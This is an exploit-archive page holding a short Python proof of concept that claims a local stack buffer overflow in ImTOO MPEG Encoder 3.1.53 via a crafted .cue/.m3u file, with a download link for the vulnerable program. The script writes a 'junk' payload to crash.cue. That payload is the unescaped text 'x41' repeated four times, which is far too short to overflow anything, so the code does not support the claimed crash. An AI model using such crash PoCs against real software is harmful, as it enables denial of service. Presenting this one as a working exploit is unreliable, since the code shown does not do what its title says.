[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC
# Published : 2009-08-06
# Author : opt!x hacker
# Previous Title : Groovy Media Player 1.2.0 (.m3u) Local Buffer Overflow PoC
# Next Title : MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC


#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker <optix@9.cn> "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()

# www.Syue.com [2009-08-06]